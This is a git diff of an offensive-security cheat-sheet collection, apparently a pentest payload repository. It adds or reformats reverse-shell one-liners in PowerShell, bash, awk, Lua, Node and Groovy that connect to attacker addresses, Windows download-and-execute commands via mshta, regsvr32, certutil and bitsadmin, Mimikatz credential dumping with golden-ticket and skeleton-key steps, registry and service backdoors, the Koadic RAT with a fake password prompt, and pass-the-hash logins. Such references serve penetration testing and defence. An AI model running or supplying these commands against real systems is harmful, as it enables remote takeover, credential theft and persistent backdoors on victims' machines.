 powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 ```
@@ -76,19 +96,40 @@ powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sock
 powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 ```
 ```powershell
 powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
 ```
-Java
+### Awk
 ```powershell
 awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
 ```
 ### Java
 ```java
 r = Runtime.getRuntime()
 p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
 p.waitFor()
 ```
-NodeJS
+### Lua
 Linux only
 ```powershell
 lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
 ```
 Windows and Linux
 ```powershell
 lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
 ```
 ### NodeJS
 ```javascript
 (function(){
    var net = require("net"),
@@ -102,15 +143,38 @@ NodeJS
    });
    return /a/; // Prevents the Node.js application form crashing
 })();
 or
 require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
 or
 -var x = global.process.mainModule.require
 -x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
 ```
 ### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
 NOTE: Java reverse shell also work for Groovy
 ```javascript
 String host="localhost";
 int port=8044;
 String cmd="cmd.exe";
 Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
 ```
 ## Spawn TTY
-```
+
 ```bash
 /bin/sh -i
 ```
 (From an interpreter)
-```
+
 ```powershell
 python -c 'import pty; pty.spawn("/bin/sh")'
 perl -e 'exec "/bin/sh";'
 perl: exec "/bin/sh";
@@ -119,25 +183,36 @@ lua: os.execute('/bin/sh')
 ```
 Access shortcuts, su, nano and autocomplete in a partially tty shell
-```
+/!\ OhMyZSH might break this trick, a simple `sh` is recommended
 ```powershell
 # in host
 ctrl+z
 stty raw -echo
 fg
 # in reverse shell
 reset
 export SHELL=bash
 export TERM=xterm-256color
 stty rows <num> columns <cols>
 ```
 /!\ OhMyZSH might break this trick
 (From within vi)
-```
+
 ```bash
 :!bash
 :set shell=/bin/bash:shell
 ```
 (From within nmap)
-```
+
 ```sh
 !sh
 ```
 ## Thanks to
 * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
 * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
 * [Spawning a TTY Shell](http://netsec.ws/?p=337)
--- a/Resources/Subdomains
+++ b/Resources/Subdomains
@@ -0,0 +1,176 @@
 # Subdomains Enumeration
 ## Summary
 * [Enumerate all subdomains](#enumerate-all-subdomains-only-if-the-scope-is-domainext)
  * Subbrute
  * KnockPy
  * GoogleDorks
  * EyeWitness
  * Sublist3r
  * Subfinder
  * Aquatone (Ruby and Go versions)
  * AltDNS
  * MassDNS
 * Subdomain take over
  * tko-subs
  * HostileSubBruteForcer
  * SubOver
 ## Enumerate all subdomains (only if the scope is *.domain.ext)
 ### Using Subbrute
 ```bash
 git clone https://github.com/TheRook/subbrute
 python subbrute.py domain.example.com
 ```
 ### Using KnockPy with Daniel Miessler’s SecLists for subdomain "/Discover/DNS"
 ```bash
 git clone https://github.com/guelfoweb/knock
 git clone https://github.com/danielmiessler/SecLists.git
 knockpy domain.com -w subdomains-top1mil-110000.txt
 ```
 Using EyeWitness and Nmap scans from the KnockPy and enumall scans
 ```bash
 git clone https://github.com/ChrisTruncer/EyeWitness.git
 ./setup/setup.sh
 ./EyeWitness.py -f filename -t optionaltimeout --open (Optional)
 ./EyeWitness -f urls.txt --web
 ./EyeWitness -x urls.xml -t 8 --headless
 ./EyeWitness -f rdp.txt --rdp
 ```
 ### Using Google Dorks and Google Transparency Report
 You need to include subdomains ;)
 https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true
 ```bash
 site:*.domain.com -www
 site:domain.com filetype:pdf
 site:domain.com inurl:'&'
 site:domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin
 site:domain.com ext:php,asp,aspx,jsp,jspa,txt,swf
 site:*.*.domain.com
 ```
 ### Using Sublist3r
 ```bash
 To enumerate subdomains of specific domain and show the results in realtime:
 python sublist3r.py -v -d example.com
 To enumerate subdomains and enable the bruteforce module:
 python sublist3r.py -b -d example.com
 To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines
 python sublist3r.py -e google,yahoo,virustotal -d example.com
 python sublist3r.py -b -d example.com
 ```
 ### Using Subfinder
 ```powershell
 go get github.com/subfinder/subfinder
 ./Subfinder/subfinder --set-config PassivetotalUsername='USERNAME',PassivetotalKey='KEY'
 ./Subfinder/subfinder --set-config RiddlerEmail="EMAIL",RiddlerPassword="PASSWORD"
 ./Subfinder/subfinder --set-config CensysUsername="USERNAME",CensysSecret="SECRET"
 ./Subfinder/subfinder --set-config SecurityTrailsKey='KEY'
 ./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt
 ```
 ### Using Aquatone - old version (Ruby)
 ```powershell
 gem install aquatone
 Discover subdomains : results in ~/aquatone/example.com/hosts.txt
 aquatone-discover --domain example.com
 aquatone-discover --domain example.com --threads 25
 aquatone-discover --domain example.com --sleep 5 --jitter 30
 aquatone-discover --set-key shodan o1hyw8pv59vSVjrZU3Qaz6ZQqgM91ihQ
 Active scans : results in ~/aquatone/example.com/urls.txt
 aquatone-scan --domain example.com
 aquatone-scan --domain example.com --ports 80,443,3000,8080
 aquatone-scan --domain example.com --ports large
 aquatone-scan --domain example.com --threads 25
 Final results
 aquatone-gather --domain example.com
 ```
 Alternatively, you can use the [Docker image](https://hub.docker.com/r/txt3rob/aquatone-docker/) provided by txt3rob.
 ```powershell
 https://hub.docker.com/r/txt3rob/aquatone-docker/
 docker pull txt3rob/aquatone-docker
 docker run -it txt3rob/aquatone-docker aq example.com
 ```
 ### Using Aquatone - new version (Go)
 ```powershell
 # Subfinder version
 ./Subfinder/subfinder -d $1 -r 8.8.8.8,1.1.1.1 -nW -o /tmp/subresult$1
 cat /tmp/subresult$1 | ./Aquatone/aquatone -ports large -out /tmp/aquatone$1
 # Amass version
 ./Amass/amass -active -brute -o /tmp/hosts.txt -d $1
 cat /tmp/hosts.txt | ./Aquatone/aquatone -ports large -out /tmp/aquatone$1
 ```
 ### Using AltDNS
 It's recommended to use massdns in order to resolve the result of `AltDNS`
 ```powershell
 WORDLIST_PERMUTATION="./Altdns/words.txt"
 python2.7 ./Altdns/altdns.py -i /tmp/inputdomains.txt -o /tmp/out.txt -w $WORDLIST_PERMUTATION
 ```
 Alternatively you can use [goaltdns](https://github.com/subfinder/goaltdns)
 ### Using MassDNS
 ```powershell
 DNS_RESOLVERS="./resolvers.txt"
 cat /tmp/results_subfinder.txt | massdns -r $DNS_RESOLVERS -t A -o S -w /tmp/results_subfinder_resolved.txt
 ```
 ## Subdomain take over
 Check [Can I take over xyz](https://github.com/EdOverflow/can-i-take-over-xyz) by EdOverflow for a list of services and how to claim (sub)domains with dangling DNS records.
 ### Using tko-subs
 ```powershell
 go get github.com/anshumanbh/tko-subs
 ./bin/tko-subs -domains=./lists/domains_tkos.txt -data=./lists/providers-data.csv  
 ```
 ### Using HostileSubBruteForcer
 ```bash
 git clone https://github.com/nahamsec/HostileSubBruteforcer
 chmox +x sub_brute.rb
 ./sub_brute.rb
 ```
 ### Using SubOver
 ```powershell
 go get github.com/Ice3man543/SubOver
 ./SubOver -l subdomains.txt
 ```
 ## Thanks
 * [Subdomain Takeover: Proof Creation for Bug Bounties - Patrik Hudak](https://0xpatrik.com/takeover-proofs/)
 * [Subdomain Takeover: Basics - Patrik Hudak](https://0xpatrik.com/subdomain-takeover-basics/)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -1,89 +1,106 @@
 # Windows - Download and execute methods
 ## Downloaded files location
 - C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
 - C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir>
 - C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
 ## Powershell
 From an HTTP server
-```
+
 ```powershell
 powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
 ```
 From a Webdav server
-```
+
 ```powershell
 powershell -exec bypass -f \\webdavserver\folder\payload.ps1
 ```
 ## Cmd
-```
+
 ```powershell
 cmd.exe /k < \\webdavserver\folder\batchfile.txt
 ```
 ## Cscript / Wscript
-```
+
 ```powershell
 cscript //E:jscript \\webdavserver\folder\payload.txt
 ```
 ## Mshta
-```
+
 ```powershell
 mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
 ```
-```
+```powershell
 mshta http://webserver/payload.hta
 ```
-```
+```powershell
 mshta \\webdavserver\folder\payload.hta
 ```
 ## Rundll32
-```
+
 ```powershell
 rundll32 \\webdavserver\folder\payload.dll,entrypoint
 ```
-```
+```powershell
 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
 ```
 ## Regasm / Regsvc @subTee
-```
+
 ```powershell
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
 ```
 ## Regsvr32 @subTee
-```
+
 ```powershell
 regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
 ```
-```
+```powershell
 regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
 ```
 ## Odbcconf
-```
+
 ```powershell
 odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
 ```
 ## Msbuild
-```
+
 ```powershell
 cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
 ```
 ## Certutil
-```
+
 ```powershell
 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
 ```
-```
+```powershell
 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
 ```
 ## Bitsadmin
 ```powershell
 bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
 ```
 ## Thanks to
- * [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
+
 - [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -2,43 +2,53 @@
 ![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
-## Mimikatz basic
+## Mimikatz - Execute commands
 Only one command
-```bash
+
 ```powershell
 PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
 ```
 Mimikatz console (multiple commands)
-```bash
+
 ```powershell
 PS C:\temp\mimikatz> .\mimikatz
 mimikatz # privilege::debug
 mimikatz # sekurlsa::logonpasswords
 mimikatz # sekurlsa::wdigest
 ```
 ## Mimikatz - Extract passwords
 ```powershell
 mimikatz_command -f sekurlsa::logonPasswords full
 mimikatz_command -f sekurlsa::wdigest
 ```
-Mimikatz Golden ticket
+## Mimikatz Golden ticket
 ```
 .\mimikatz kerberos::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
 ```powershell
 .\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
 ```
 ```powershell
 .\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
 ```
-Mimikatz Skeleton key
+## Mimikatz Skeleton key
-```
+
 ```powershell
 privilege::debug
 misc::skeleton
 # map the share
 net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
 # login as someone
 rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
 ```
 ## Mimikatz commands
 | Command |Definition|
 |:----------------:|:---------------|
 | CRYPTO::Certificates|list/export certificates|
@@ -64,16 +74,18 @@ rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
 |TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box|
 |TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials.
 ## Powershell Mimikatz
 Mimikatz in memory (no binary on disk) with :
- - [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1) from PowerShellEmpire
+
- - [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1) from PowerSploit
+- [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1) from PowerShellEmpire
 - [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1) from PowerSploit
 More informations can be grabbed from the Memory with :
- - [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1)
+
 - [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1)
 ## Thanks to
- * [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
+
- * [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
+- [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
 - [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -3,21 +3,26 @@
 ## Userland
 ### Registry
 Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.
-```
+
 ```powershell
 Value name:  Backdoor
 Value data:  C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
 ```
 ### Startup
 Create a batch script in the user startup folder.
-```
+
 ```powershell
 PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
 start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
 ```
 ### Scheduled Task
-```
+
 ```powershell
 PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
 PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
 PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
@@ -26,25 +31,30 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
 PS C:\> Register-ScheduledTask Backdoor -InputObject $D
 ```
 ## Elevated
 ### HKLM
 Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.
-```
+
 ```powershell
 Value name:  Backdoor
 Value data:  C:\Windows\Temp\backdoor.exe
 ```
 ### Services
 Create a service that will start automatically or on-demand.
-```
+
 ```powershell
 PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."
 ```
 ### Scheduled Tasks
 Scheduled Task to run as SYSTEM, everyday at 9am.
-```
+
 ```powershell
 PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
 PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
 PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
@@ -53,7 +63,7 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
 PS C:\> Register-ScheduledTask Backdoor -InputObject $D
 ```
 ## Thanks to
- * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
+
- * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
+* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
 * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -0,0 +1,123 @@
 # Koadic C3 COM Command & Control - JScript RAT
 > Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire.
 ## Installation
 ```powershell
 git clone https://github.com/zerosum0x0/koadic
 git submodule init
 git submodule update
 pip2.7 install -r requirements.txt --user
 python2.7 koadic
 ```
 ## Set a listener
 ```powershell
 use stager/js/mshta
 set LHOST 192.168.1.19
 set SRVPORT 4444
 run
 [>] mshta http://192.168.1.19:4444/6DX7f
 ```
 ```powershell
 use stager/js/wmic
 set LHOST 192.168.1.19
 set SRVPORT 4444
 run
 [>] wmic os get /FORMAT:"http://192.168.1.19:4444/lQGx5.xsl"
 ```
 ### Stagers
 Stagers hook target zombies and allow you to use implants.
 Module | Description
 --------|------------
 stager/js/mshta | serves payloads using MSHTA.exe HTML Applications
 stager/js/regsvr | serves payloads using regsvr32.exe COM+ scriptlets
 stager/js/wmic | serves payloads using WMIC XSL
 stager/js/rundll32_js | serves payloads using rundll32.exe
 stager/js/disk | serves payloads using files on disk
 ## List zombies and interact with them
 ```powershell
 (koadic: sta/js/wmic)$ zombies
        ID   IP              STATUS  LAST SEEN
        ---  ---------       ------- ------------
        0    192.168.1.30    Alive   2018-10-04 17:07:12
 (koadic: sta/js/wmic)$ zombies 0
        ID:                     0
        Status:                 Alive
        First Seen:             2018-10-04 17:05:00
        Last Seen:              2018-10-04 17:14:42
        IP:                     192.168.1.30
        User:                   DESKTOP-68URA9U\CrashWin
        [...]
        Elevated:               No
        [...]
 ```
 Interact with `zombies zombie_id`, get a shell with `cmdshell zombie_id`.
 ```powershell
 [koadic: ZOMBIE 0 (192.168.1.30) - C:\Users\CrashWin]> whoami
 [*] Zombie 0: Job 1 (implant/manage/exec_cmd) created.
 [+] Zombie 0: Job 1 (implant/manage/exec_cmd) completed.
 Result for `cd C:\Users\CrashWin & whoami`:
 desktop-68ura9u\crashwin
 ```
 ## Use an implant
 Select an implant with `use module`, then fill the `info` with `set INFO value`, finally start the module with `run`.
 ```powershell
 (koadic: sta/js/mshta)$ use implant/phish/password_box
 (koadic: imp/phi/password_box)$ set ZOMBIE 1
 (koadic: imp/phi/password_box)$ run
 Input contents:
 MyStrongPassword123!
 ```
 ### Implants
 Implants start jobs on zombies.
 Module | Description
 --------|------------
 implant/elevate/bypassuac_eventvwr | Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.
 implant/elevate/bypassuac_sdclt | Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10.
 implant/fun/zombie | Maxes volume and opens The Cranberries YouTube in a hidden window.
 implant/fun/voice | Plays a message over text-to-speech.
 implant/gather/clipboard | Retrieves the current content of the user clipboard.
 implant/gather/enum_domain_info | Retrieve information about the Windows domain.
 implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive.
 implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file.
 implant/gather/user_hunter | Locate users logged on to domain computers (using Dynamic Wrapper X).
 implant/inject/mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
 implant/inject/mimikatz_dotnet2js | Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).
 implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed).
 implant/manage/enable_rdesktop | Enables remote desktop on the target.
 implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output.
 implant/phishing/password_box | Prompt a user to enter their password.
 implant/pivot/stage_wmi | Hook a zombie on another machine using WMI.
 implant/pivot/exec_psexec | Run a command on another machine using psexec from sysinternals.
 implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN.
 implant/utils/download_file | Downloads a file from the target zombie.
 implant/utils/multi_module | Run a number of implants in succession.
 implant/utils/upload_file | Uploads a file from the listening server to the target zombies.
 ## Thanks
 - [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/)
 - [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -1,24 +1,27 @@
 # Windows - Privilege Escalation
 Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/)
 ## Windows Version and Configuration
 ```powershell
 systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
 ```
 Architecture
 ```powershell
 wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
 ```
 List all env variables
 ```powershell
 set
 ```
 List all drives
 ```powershell
 wmic logicaldisk get caption || fsutil fsinfo drives
 ```
@@ -26,22 +29,26 @@ wmic logicaldisk get caption || fsutil fsinfo drives
 ## User Enumeration
 Get current username
 ```powershell
 echo %USERNAME% || whoami
 ```
 List all users
 ```powershell
 net user
 whoami /all
 ```
 List logon requirements; useable for bruteforcing
 ```powershell
 net accounts
 ```
 Get details about a user (i.e. administrator, admin, current user)
 ```powershell
 net user administrator
 net user admin
@@ -49,11 +56,13 @@ net user %USERNAME%
 ```
 List all local groups
 ```powershell
 net localgroup
 ```
 Get details about a group (i.e. administrators)
 ```powershell
 net localgroup administrators
 ```
@@ -61,31 +70,37 @@ net localgroup administrators
 ## Network Enumeration
 List all network interfaces
 ```powershell
 ipconfig /all
 ```
 List current routing table
 ```powershell
 route print
 ```
 List the ARP table
 ```powershell
 arp -A
 ```
 List all current connections
 ```powershell
 netstat -ano
 ```
 List firware state and current configuration
 ```powershell
 netsh advfirewall firewall dump
 ```
 List all network shares
 ```powershell
 net share
 ```
@@ -93,28 +108,34 @@ net share
 ## Looting for passwords
 ### Search for file contents**
 ```powershell
 cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
 ```
 ### Search for a file with a certain filename
 ```powershell
 dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
 ```
 ### Search the registry for key names
 ```powershell
 REG QUERY HKLM /F "password" /t REG_SZ /S /K
 REG QUERY HKCU /F "password" /t REG_SZ /S /K
 ```
 ### Read a value of a certain sub key
 ```powershell
 REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
 ```
 ### Password in unattend.xml
 Location of the unattend.xml files
 ```powershell
 C:\unattend.xml
 C:\Windows\Panther\Unattend.xml
@@ -124,12 +145,13 @@ C:\Windows\system32\sysprep\sysprep.xml
 ```
 Example content
 ```powershell
-   <component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
+<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
    <AutoLogon>
     <Password>*SENSITIVE*DATA*DELETED*</Password>
-     <Enabled>true</Enabled> 
+     <Enabled>true</Enabled>
-     <Username>Administrateur</Username> 
+     <Username>Administrateur</Username>
    </AutoLogon>
    <UserAccounts>
@@ -142,47 +164,57 @@ Example content
     </LocalAccounts>
    </UserAccounts>
 ```
 The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
 ## Processes Enum
 What processes are running?
 ```powershell
 tasklist /v
 ```
 Which processes are running as "system"
 ```powershell
 tasklist /v /fi "username eq system"
 ```
 Do you have powershell magic?
 ```powershell
 REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
 ```
 ## Uploading / Downloading files
 a wget using powershell
 ```powershell
 powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe"
 ```
 wget using bitsadmin (when powershell is not present)
 ```powershell
 cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe"
 ```
 now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat
 ```powershell
 %TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe
 ```
 ## Spot the weak service using PowerSploit's PowerUP
 ```powershell
 powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
 ```
 ## Thanks to
 * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
 * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
 * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -1,25 +1,30 @@
 # Windows - Using credentials
 ## TIP 1 - Create your credential :D
 ```powershell
 net user hacker hacker /add
 net localgroup administrators hacker /add
 ```
 Some info about your user
 ```powershell
 net user /dom
 net user /domain
 ```
 ## TIP 2 - Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289)
 when you run Windows in retail demo mode, it creates a user named Darrin DeYoung and an admin RetailAdmin
 ```powershell
 Username: RetailAdmin
 Password: trs10
 ```
 ## Metasploit - SMB
 ```c
 use auxiliary/scanner/smb/smb_login  
 set SMBDomain CSCOU  
@@ -31,7 +36,9 @@ creds
 ```
 ## Metasploit - Psexec
 Note: the password can be replaced by a hash to execute a `pass the hash` attack.
 ```c
 use exploit/windows/smb/psexec
 set RHOST 10.2.0.3
@@ -43,6 +50,7 @@ shell
 ```
 ## Crackmapexec (Integrated to Kali)
 ```python
 git clone https://github.com/byt3bl33d3r/CrackMapExec.github
 python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r
@@ -50,16 +58,19 @@ python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami
 ```
 ## Crackmapexec (Pass The Hash)
-```
+
 ```powershell
 cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth
 ```
 ## Winexe (Integrated to Kali)
 ```python
 winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe
 ```
 ## Psexec.py / Smbexec.py / Wmiexec.py (Impacket)
 ```python
 git clone https://github.com/CoreSecurity/impacket.git
 python psexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
@@ -68,12 +79,14 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
 ```
 ## RDP Remote Desktop Protocol (Impacket)
 ```powershell
 python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
